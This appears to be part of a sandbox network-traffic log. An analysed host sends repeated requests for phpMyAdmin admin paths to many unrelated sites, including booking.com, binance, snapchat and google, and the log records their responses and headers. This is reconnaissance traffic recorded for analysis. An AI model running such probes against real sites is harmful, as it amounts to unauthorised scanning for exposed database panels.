                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 7a 54 56 74 45 37 70 58 6a 73 45 76 52 56 75 35 6b 39 2d 5a 35 53 69 72 4b 45 70 46 2d 46 4f 74 34 36 6f 55 67 47 44 59 67 72 6a 47 4d 34 71 65 6b 75 4b 30 39 38 46 71 62 6d 53 33 6d 71 54 4e 32 58 39 39 4c 48 7a 45 49 58 6e 4b 43 73 6f 35 5f 42 37 59 55 78 48 35 38 68 6d 31 79 4d 6b 55 65 39 65 30 48 6f 58 4f 36 71 45 6e 68 47 4f 50 32 6a 4e 51 36 48 68 53 70 64 55 49 72 57 4b 39 74 65 37 67 61 54 4c 31 39 6c 55 54 31 49 35 7a 6f 38 7a 37 50 70 4d 71 6a 42 63 54 73 37 78 46 6f 4c 73 73 47 47 44 62 58 44 57 47 78 33 4f 55 71 79 58 51 39 56 69 41 69 4d 4b 79 62 6b 33 59 6f 72 30 30 34 38 6e 46 4f 4a 7a 41 79 31 4b 71 69 70 44 72 47 63 6a 53 53 32 5f 35 38 66 62 2d 48 6b 58 54 77 69 6c 71 41 30 67 72 35 67 49 68 31 72 4e 41 58 4b 77 48 31 58 31 4b 63 41 48
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: zTVtE7pXjsEvRVu5k9-Z5SirKEpF-FOt46oUgGDYgrjGM4qekuK098FqbmS3mqTN2X99LHzEIXnKCso5_B7YUxH58hm1yMkUe9e0HoXO6qEnhGOP2jNQ6HhSpdUIrWK9te7gaTL19lUT1I5zo8z7PpMqjBcTs7xFoLssGGDbXDWGx3OUqyXQ9ViAiMKybk3Yor0048nFOJzAy1KqipDrGcjSS2_58fb-HkXTwilqA0gr5gIh1rNAXKwH1X1KcAH
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 34 39 78 69 46 4f 7a 65 6c 39 64 74 54 39 42 42 38 4c 64 71 78 51 42 31 46 44 32 35 6c 6c 54 42 61 6d 37 78 2d 56 75 36 6c 69 59 39 34 7a 43 6f 54 65 78 44 2d 4e 56 61 54 32 4e 6f 44 64 50 6f 4c 6b 36 6c 49 48 31 46 58 37 33 66 54 73 4c 5f 35 4e 6d 6a 62 30 2d 6d 5f 74 51 4e 6b 31 44 34 50 48 75 68 2d 4f 47 4b 66 63 68 56 4d 53 6e 6b 42 6e 44 44 33 34 66 55 6c 76 51 52 2d 48 5a 6c 75 6e 6f 66 68 4d 43 4f 6b 57 73 58 68 6b 37 7a 38 4e 38 66 4f 57 4e 68 69 76 6f 37 64 74 77 59 38 6c 5f 37 54 59 6d 76 70 54 2d 59 41 55 69 65 38 55 5a 71 4e 4d 76 43 69 62 4f 43 53 74 37 42 6b 75 44 37 70 51 48 22 2c 63 52 71 3a 20 7b 72 75 3a 20 27 61 48 52 30 63 48 4d 36 4c 79 39 74 62 32 70 68 5a 47 39 32 5a 58 4a 68 4c 6e 4e 72 4c 33 42 6f 63 45 31 35 51 57 52 74 61 57 34
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 49xiFOzel9dtT9BB8LdqxQB1FD25llTBam7x-Vu6liY94zCoTexD-NVaT2NoDdPoLk6lIH1FX73fTsL_5Nmjb0-m_tQNk1D4PHuh-OGKfchVMSnkBnDD34fUlvQR-HZlunofhMCOkWsXhk7z8N8fOWNhivo7dtwY8l_7TYmvpT-YAUie8UZqNMvCibOCSt7BkuD7pQH",cRq: {ru: 'aHR0cHM6Ly9tb2phZG92ZXJhLnNrL3BocE15QWRtaW4


Session ID    Source IP      Source Port    Destination IP    Destination Port
163           192.168.2.6    63487          44.233.131.115    443

Timestamp                  Bytes transferred    Direction    Data
2024-02-05 11:16:10 UTC    174                  OUT          GET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: cloud.simplify3d.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC    216                  IN           HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, private
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 6854
                                                                                                                                                                                                                                                                                                                                                                Connection: Close
2024-02-05 11:16:10 UTC    6854                 IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Page Not Found</title><meta name="description" co


Session ID    Source IP      Source Port    Destination IP    Destination Port
164           192.168.2.6    63414          3.161.150.69      443

Timestamp                  Bytes transferred    Direction    Data
2024-02-05 11:16:10 UTC    180                  OUT          GET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: account.booking.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:11 UTC    2006                 IN           HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                server: envoy
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: frame-ancestors https://*.booking.com 'self'; report-uri https://nellie.booking.com/csp-report-uri?type=block&tag=212&pid=226c4f3d552000f1&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgX8c1xrgbYjEjhmvgRFMYCytVNxLTDudX19W6VDmrB7p
                                                                                                                                                                                                                                                                                                                                                                content-security-policy-report-only: base-uri 'none'; connect-src saa.booking.com secure.booking.com reports.booking.com privacyportal-eu.onetrust.com geolocation.onetrust.com cdn.cookielaw.org www.google-analytics.com *.perimeterx.net *.pxchk.net *.px-cdn.net *.px-client.net *.px-cloud.net 'self' 'report-sample'; default-src *.bstatic.com bstatic.com 'self'; frame-src https://www.youtube.com/embed/Vv4w5SmRkss *.bstatic.com https://www.google.com bstatic.com www.booking.com secure.booking.com paymentcomponent.booking.com 'self'; img-src 'self' data: www.booking.com graph.facebook.com cdn.cookielaw.org account.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google-analytics.com www.google.com stats.g.doubleclick.net *.px-cloud.net *.perimeterx.net www.gstatic.com; object-src 'none'; report-uri https://nellie.booking.com/csp-report-uri?type=report&tag=213&pid=226c4f3d552000f1&e=UmFuZG9tSVYkc2RlIyh9YSWKtKO5TxgOpTwVTPfHZKNW3Hcrm1RLgX8c1xrgbYjEjhmvgRFMYCytVNxLTDudX19W6VDmrB7p; script-src saa.booking.com *.bstatic.com bstatic.com *.static.booking.cn www.google.com www.google-analytics.com cdn.cookielaw.org geolocation.onetrust.com 'self' 'nonce-4FoQJYptw226Jz9' 'report-sample'; style-src *.bstatic.com bstatic.com *.static.booking.cn 'self' 'unsafe-inline'
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=86400; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Error from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 7e1e27db89c10c5d284149b3df2ae272.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P5
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: ntyc4_WfB32n94q2xE1WWrnDUQXu-X2wHxszpzuKHWFbC5Kf3wVdHg==
2024-02-05 11:16:11 UTC  14378  IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 55b8<!DOCTYPE html><html><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><title>Not Found</title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0
2024-02-05 11:16:11 UTC  7574  IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: tories","country_code":"tf","prefix":"+33"},{"country_code":"tg","name":"Togo","prefix":"+228"},{"name":"Thailand","country_code":"th","prefix":"+66"},{"country_code":"tj","name":"Tajikistan","prefix":"+992"},{"country_code":"tk","name":"Tokelau","prefix"
2024-02-05 11:16:11 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                                                                                                                                                                                                                                                                                                165192.168.2.6633923.161.136.2443
Timestamp  Bytes transferred  Direction  Data
2024-02-05 11:16:10 UTC  181  OUT  GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.binance.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:11 UTC  701  IN  HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 66
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Tuser
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.binance.com/en/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                                                X-Gateway: traefik
                                                                                                                                                                                                                                                                                                                                                                X-Trace-Id: de2bd4f3a1784961be6643bef4eee14a
                                                                                                                                                                                                                                                                                                                                                                X-Traefik-Duration: 0.00
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 8f7f25a8ec7b36657c310241b9ad397e.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P4
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: 7NdhFscoXlKgFxJtpnuSHDZosrS98KOE2mxyuP3mkaRXsMbgZOaJPQ==
2024-02-05 11:16:11 UTC  66  IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <a href="https://accounts.binance.com/en/phpmyadmin/">Found</a>.


Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                                                                                                                                                                                                                                                                                                166192.168.2.66344934.149.46.130443
Timestamp  Bytes transferred  Direction  Data
2024-02-05 11:16:10 UTC  182  OUT  GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.snapchat.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC  5706  IN  HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html;charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                set-cookie: sc-wcid=4d4d0a93-e2f4-414f-b79d-51d5c62a9c21; Path=/; Domain=.snapchat.com; Expires=Tue, 06-Feb-2024 11:16:10 GMT; Max-Age=86400; Secure
                                                                                                                                                                                                                                                                                                                                                                expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubdomains
                                                                                                                                                                                                                                                                                                                                                                x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: allow-from https://iframe.arkoselabs.com
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com 
https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;
                                                                                                                                                                                                                                                                                                                                                                x-content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com 
https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;
                                                                                                                                                                                                                                                                                                                                                                x-cloud-trace-context: a468c21a534d8f3e409e7d524b2473dd
date: Mon, 05 Feb 2024 11:16:10 GMT
server: API Gateway
Content-Length: 664
via: 1.1 google, 1.1 google
alt-svc: clear
strict-transport-security: max-age=31536000; includeSubDomains
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2024-02-05 11:16:10 UTC | 664 | IN | Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head><meta charset="utf-8"><meta name="referrer" content="origin"><meta name="apple-itunes-app" content="app-id=447188370"><title>404 &b


Session ID | Source IP | Source Port | Destination IP | Destination Port
167 | 192.168.2.6 | 63618 | 178.16.128.181 | 443

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 173 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: mobilsam.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 762 | IN | HTTP/1.1 404 Not Found
Connection: close
x-powered-by: PHP/8.1.26
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-cache, must-revalidate, max-age=0
content-type: text/html; charset=UTF-8
link: <https://mobilsam.com/wp-json/>; rel="https://api.w.org/"
x-litespeed-cache-control: public,max-age=3600
x-litespeed-tag: 106_HTTP.404,106_404,106_URL.1e5f09d904a9efd2fc928c187452329f,106_
x-litespeed-cache: miss
transfer-encoding: chunked
date: Mon, 05 Feb 2024 11:16:10 GMT
server: LiteSpeed
platform: hostinger
content-security-policy: upgrade-insecure-requests
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


Session ID | Source IP | Source Port | Destination IP | Destination Port
168 | 192.168.2.6 | 63613 | 172.67.218.172 | 443

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 180 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: www.phonandroid.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:11 UTC | 821 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:16:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                                                Link: <https://www.phonandroid.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-Backend: k8s-prod2-be
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yQRDLwuCZXsMcMOMH6akPJ67grJMWdAshapPU%2BtcvGUbJUcYM2f2kTwh1wPS8euddvLf0Q2sZsdn05987J0nFSFw8qeU7m2d8rFgvUpoRiJmriD6tez2I1cFjmGXmh4oDhRO7ro0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd5e2b9653fe-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port
169 | 192.168.2.6 | 63695 | 31.216.144.5 | 443

Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 157 | OUT | GET / HTTP/1.1
Host: mega.nz
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 969 | IN | HTTP/1.1 200 OK
Content-Type: text/html
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: MEGA-Chrome-Antileak
Access-Control-Max-Age: 86400
Content-Length: 2689
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
Set-Cookie: geoip=RO
Content-Security-Policy: default-src 'self' data: blob: *.mega.co.nz *.mega.nz *.mega.io http://*.mega.co.nz http://*.mega.nz http://*.mega.io wss://*.karere.mega.nz wss://*.sfu.mega.co.nz *.karere.mega.nz:1380 http://127.0.0.1:6341 localhost.megasyncloopback.mega.nz:6342; script-src 'self' *.mega.co.nz *.mega.nz *.mega.io data: blob:; style-src 'self' 'unsafe-inline' *.mega.co.nz *.mega.nz *.mega.io data: blob:; frame-src 'self' *.megapay.nz mega: *.megaad.nz https://mega.nz/ https://mega.io/; img-src 'self' *.mega.co.nz *.mega.nz *.mega.io data: blob: mega.nz
Connection: Close
2024-02-05 11:16:10 UTC | 2689 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><title>MEGA</title><meta name="description" content="MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 20GB now" /><meta property="og:title


Session ID | Source IP | Source Port | Destination IP | Destination Port
170 | 192.168.2.6 | 63115 | 142.250.105.84 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 180 | OUT | GET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 842 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
2024-02-05 11:16:10 UTC | 1252 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9vN7nWZXiyfUaNEYC5tSKQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
2024-02-05 11:16:10 UTC | 397 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
2024-02-05 11:16:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
171 | 192.168.2.6 | 63758 | 163.247.44.239 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 186 | OUT | GET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mitextoescolar.mineduc.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 240 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                location: http://mitextoescolar.mineduc.cl/phpMyAdmin
                                                                                                                                                                                                                                                                                                                                                                content-length: 251
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                connection: close
2024-02-05 11:16:10 UTC | 251 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://mitextoescolar.mineduc.cl/phpMyAdmin">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
172 | 192.168.2.6 | 63409 | 142.250.105.84 | 443
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:16:10 UTC | 180 | OUT | GET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:16:10 UTC | 842 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 05 Feb 2024 11:16:10 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
